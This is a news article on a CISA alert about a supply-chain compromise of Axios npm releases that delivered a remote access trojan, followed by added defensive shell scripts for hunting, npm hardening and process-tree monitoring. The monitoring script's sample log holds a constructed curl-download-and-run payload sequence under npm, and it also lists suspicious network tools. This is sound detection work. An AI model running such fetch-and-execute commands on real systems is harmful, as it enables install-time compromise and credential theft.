
CISA warns organizations of supply chain compromise in Axios npm package delivering remote access trojan


The U.S. CISA (Cybersecurity and Infrastructure Security Agency) issued an alert warning of a supply chain compromise affecting the Axios npm package, urging organizations to take immediate steps to detect and remediate any exposure linked to the affected versions. Axios is one of the more ubiquitous tools in the JavaScript ecosystem, a widely used HTTP client embedded across Node.js and browser-based applications, which means a single compromised release can reach a large share of the development environments that install it.

“On March 31, 2026, two npm packages for versions [email protected] and [email protected] of Axios npm injected the malicious dependency [email protected] that downloads multi-stage payloads from cyber threat actor infrastructure, including a remote access trojan,” CISA wrote in its Monday alert.

While Axios appears on the surface to be a standard web and IT component, the risk profile shifts significantly when examined through the lens of how modern OT (operational technology) environments are designed and maintained.

The risk of attackers moving from IT systems into OT environments is no longer a hypothetical concern. Compromised developer environments and CI/CD pipelines have become realistic entry points into industrial networks, especially as many organizations now run shared DevOps pipelines to support HMI dashboards, IIoT applications, and data integration. A remote access trojan slipped in during a routine package installation can quietly collect credentials, tokens, and SSH keys before anyone notices, which is precisely why CISA is telling organizations to assume they are already compromised and rotate credentials immediately.

The problem runs deeper as web technologies become more common inside OT environments. Axios is embedded in industrial web dashboards, edge and IIoT gateways, and the API layers that connect cloud systems to plant-floor operations. It does not sit at the level of PLCs or direct control systems, but it lives in the connective tissue between IT and OT environments, a layer where visibility is thin and security controls are often an afterthought.

At a broader level, this incident is a reminder of how much supply chain attacks have matured. A single compromised package can ripple across thousands of downstream systems, with malicious code executing at build or installation time, well before any runtime defenses have a chance to respond. In OT environments, where build pipelines and software dependencies are routinely trusted without meaningful verification, that window of exposure is especially difficult to close.

CISA advised organizations to monitor and review code repositories, CI/CD pipelines, and developer machines that executed npm install or npm update using the compromised packages. Organizations should also search for cached versions of affected dependencies within artifact repositories and dependency management tools, while pinning npm package dependencies to known safe releases to prevent further exposure.

If compromised dependencies are identified, environments should be reverted to a known safe state. This includes downgrading to [email protected] or [email protected] and removing the malicious plain-crypto-js package from node_modules. At the same time, any credentials that may have been exposed must be rotated or revoked, including version control system tokens, CI/CD secrets, cloud keys, npm tokens, and SSH keys. In cases involving ephemeral CI jobs, all secrets injected into the compromised runs should be rotated without exception.
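The detection and remediation steps above, as an added shell example that is not part of CISA's alert or of any vendor tooling. It hunts a directory of checkouts, build workspaces or artifact mirrors for the injected dependency named in the alert (plain-crypto-js) in lockfiles, manifests, installed node_modules trees and the local npm cache index, then stages the remediation. The safe Axios version is not reproduced here; the remediation function takes it as an argument. Function names, the default cache path (~/.npm/_cacache) and the test fixtures are this example's own assumptions.

```shell
#!/usr/bin/env bash
# Added example, not from CISA's alert: hunt for the injected dependency the
# alert names, plain-crypto-js, then stage the remediation CISA describes.
# The safe Axios version to pin is not reproduced here; pass the one from the
# alert as the second argument to remediate.

MALICIOUS_PKG="plain-crypto-js"

# scan_tree ROOT: print every lockfile/manifest under ROOT that references the
# package and every installed copy under a node_modules directory.
# Exit status 0 = something found, 1 = tree is clean.
scan_tree() {
    hits=$(
        {
            find "$1" -type f \( -name package-lock.json -o -name npm-shrinkwrap.json \
                -o -name package.json -o -name yarn.lock -o -name pnpm-lock.yaml \) \
                -exec grep -lF "$MALICIOUS_PKG" {} + 2>/dev/null
            find "$1" -type d -path "*/node_modules/$MALICIOUS_PKG" 2>/dev/null
        } | sort -u
    )
    [ -n "$hits" ] || return 1
    printf '%s\n' "$hits"
}

# scan_npm_cache [CACHE_DIR]: npm's content-addressed cache keeps an index
# keyed by tarball URL, so a fetched copy is visible there even after the
# node_modules directory was deleted. Default path is an assumption for
# Linux/macOS user installs; CI runners often relocate it.
scan_npm_cache() {
    cache="${1:-$HOME/.npm/_cacache}"
    [ -d "$cache/index-v5" ] || return 1
    grep -rlF "$MALICIOUS_PKG" "$cache/index-v5" 2>/dev/null
}

# remediate PROJECT_DIR SAFE_AXIOS_VERSION: remove the injected package and
# pin axios to the version the alert lists as safe, without running any
# lifecycle scripts. Credentials seen by this machine must still be rotated.
remediate() {
    rm -rf "$1/node_modules/$MALICIOUS_PKG"
    (cd "$1" && npm install --ignore-scripts --save-exact "axios@$2")
}

# Usage: ./hunt.sh --scan /srv/checkouts
if [ "${1:-}" = "--scan" ]; then
    if scan_tree "${2:-.}"; then
        echo "== references found above; rotate secrets and remediate =="
    else
        echo "clean: no reference to $MALICIOUS_PKG under ${2:-.}"
    fi
    if scan_npm_cache; then
        echo "== cached tarball index entries above =="
    else
        echo "npm cache: no entry for $MALICIOUS_PKG"
    fi
fi
```

Run the scan on every developer workstation and CI runner image, not just the repository server: the cache check is what catches a machine that installed the package once and has since cleaned its working tree. A hit anywhere means the credentials that machine held (npm tokens, CI secrets, SSH and cloud keys) are treated as exposed and rotated, exactly as the alert requires.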

CISA further recommends monitoring for unusual child processes and anomalous network behavior, particularly during npm installation or update processes. Organizations should block and track outbound connections to known malicious domains such as Sfrclak domains, and carry out continuous indicator searches alongside endpoint detection and response hunts to ensure no indicators of compromise remain and that no further command-and-control communication persists.

Beyond immediate remediation, CISA recommends that organizations using Axios npm mandate phishing-resistant multifactor authentication (MFA) across developer accounts, especially for critical platforms. They must also configure npm (through its configuration file) so that package lifecycle scripts do not execute during installation, which removes the most common vehicle for install-time payloads. In addition, they must ensure only packages that have been published for at least seven days are installed, reducing the risk of pulling in unvetted or potentially malicious dependencies.
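The two npm-side controls in the previous paragraph, as an added shell example that is not from CISA's alert: a project .npmrc that disables lifecycle scripts and records exact versions, plus an install wrapper that applies npm's --before option so nothing published in the last seven days can be resolved. The options ignore-scripts, save-exact, --before and --ignore-scripts=false are real npm settings; the function names, the seven-day default and the directory layout are this example's assumptions.

```shell
#!/usr/bin/env bash
# Added example, not from CISA's alert: the two npm-side controls the alert
# asks for, expressed as a project .npmrc plus an install wrapper.
#  1. ignore-scripts: install-time lifecycle hooks of dependencies do not run.
#  2. --before: resolve only versions the registry published at least DAYS
#     days ago, which is what the seven-day rule amounts to in npm terms.
# Assumed layout: the project root is passed as DIR.

# write_hardened_npmrc DIR: write DIR/.npmrc (commit it with the project so
# every developer machine and CI runner picks it up).
write_hardened_npmrc() {
    cat > "$1/.npmrc" <<'EOF'
# Refuse preinstall/install/postinstall hooks of every dependency. Explicit
# "npm run <script>" still works; only pre-/post- hooks are skipped.
ignore-scripts=true
# Record exact versions instead of ^ranges so a later install cannot float
# onto a newly published release.
save-exact=true
EOF
}

# cutoff_date DAYS: UTC ISO-8601 timestamp DAYS days ago. GNU date first,
# BSD/macOS syntax as a fallback.
cutoff_date() {
    date -u -d "$1 days ago" +%Y-%m-%dT%H:%M:%SZ 2>/dev/null \
        || date -u -v-"$1"d +%Y-%m-%dT%H:%M:%SZ
}

# install_aged DIR [DAYS]: install with the age cutoff applied. Versions whose
# registry publish time is after the cutoff are not eligible, so a dependency
# that only has a newer release produces a no-matching-version error instead
# of quietly installing something published hours ago.
install_aged() {
    days="${2:-7}"
    (cd "$1" && npm install --before="$(cutoff_date "$days")")
}

# rebuild_reviewed DIR PKG: the one deliberate exception to ignore-scripts,
# for a package whose build script you have actually read (native addons).
rebuild_reviewed() {
    (cd "$1" && npm rebuild --ignore-scripts=false "$2")
}
```

The trade-off to know about: with ignore-scripts in force, packages that compile native code will install without building, so the rebuild step is run per package after review rather than re-enabling scripts globally. The --before filter is only as good as the registry's publish timestamps, so it complements, rather than replaces, pinning and lockfile review.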

Furthermore, organizations must establish and maintain a baseline of normal execution behavior for tools that use Axios. They must also alert when a dependency behaves differently from that baseline, for example by building containers, spawning shells, or executing commands, and trace outbound network activity for anomalous connections.
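The child-process monitoring CISA describes two paragraphs up and the behavioral baseline in the paragraph just above, as one added example that is not from the alert or from any EDR product. Normal npm install activity looks like node (running npm) spawning sh -c for a lifecycle script, which in turn runs node; the awk program below encodes that as the baseline and emits an ALERT for any process under an npm ancestor that is a downloader or extra interpreter, or that runs a file from a temp directory. The log format (timestamp pid ppid comm cmdline) and the sample events are constructed for this example; the curl targets use an RFC 2606 reserved domain and are not indicators from the alert.

```shell
#!/usr/bin/env bash
# Added example, not from CISA's alert or any vendor tool: a process-tree
# check that implements the "baseline of normal execution" the alert asks for.
# Input: constructed, space-separated process-create events,
#   timestamp pid ppid comm cmdline...
# Adapt the field positions to whatever your EDR or auditd export emits.

# write_sample_log FILE: constructed sample events. The domains are reserved
# example names, not real indicators.
write_sample_log() {
    cat > "$1" <<'EOF'
2026-03-31T12:00:01Z 4100 1 bash -bash
2026-03-31T12:00:03Z 4102 4100 node node /usr/bin/npm install
2026-03-31T12:00:05Z 4103 4102 sh sh -c node scripts/postinstall.js
2026-03-31T12:00:06Z 4104 4103 node node scripts/postinstall.js
2026-03-31T12:00:07Z 4105 4104 curl curl -fsSL https://stage2.example.invalid/p -o /tmp/.cache.sh
2026-03-31T12:00:08Z 4106 4104 bash bash /tmp/.cache.sh
2026-03-31T12:00:09Z 4200 1 sshd sshd: session
2026-03-31T12:00:10Z 4201 4200 curl curl https://updates.example.invalid/
EOF
}

# flag_npm_children FILE: print one ALERT line per out-of-baseline process
# that has an npm process somewhere in its ancestry. Processes elsewhere in
# the tree (the sshd-spawned curl above) are ignored: the point is what a
# package install did, not every curl on the box.
flag_npm_children() {
    awk '
    BEGIN {
        n = split("curl wget nc ncat perl python python3 powershell pwsh base64 chmod", s, " ")
        for (i = 1; i <= n; i++) susp[s[i]] = 1
    }
    {
        pid = $2; ppid = $3
        parent[pid] = ppid; name[pid] = $4
        cmd = $5; for (i = 6; i <= NF; i++) cmd = cmd " " $i
        cmdline[pid] = cmd
        order[++count] = pid
    }
    END {
        for (k = 1; k <= count; k++) {
            pid = order[k]
            # climb the tree; stop at the first npm process, or at the top
            root = ""; anc = parent[pid]; depth = 0
            while ((anc in name) && depth++ < 32) {
                if (name[anc] == "npm" || cmdline[anc] ~ /(^|\/)npm( |$)|npm-cli\.js/) { root = anc; break }
                anc = parent[anc]
            }
            if (root == "") continue
            reason = ""
            if (name[pid] in susp) reason = "downloader or extra interpreter"
            else if (cmdline[pid] ~ /(\/tmp\/|\/dev\/shm\/|\/var\/tmp\/)/) reason = "runs or writes a file in a temp dir"
            if (reason != "")
                printf "ALERT pid=%s comm=%s under-npm-pid=%s reason=\"%s\" cmd=\"%s\"\n", pid, name[pid], root, reason, cmdline[pid]
        }
    }' "$1"
}

# count_alerts FILE: number of ALERT lines, for a dashboard or a CI gate.
count_alerts() {
    flag_npm_children "$1" | grep -c '^ALERT'
}

# Usage: write_sample_log /tmp/procs.log && flag_npm_children /tmp/procs.log
```

On the sample events this flags the curl download and the bash execution of the downloaded file, and nothing else. Running the same logic over real process telemetry from a CI runner during npm install or npm update gives the behavioral baseline the alert asks for: the shell-wrapped node lifecycle script is expected, a downloader or an interpreter running out of /tmp under that tree is not. Pair it with egress logging so the same alert can be joined to the outbound connection it produced.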
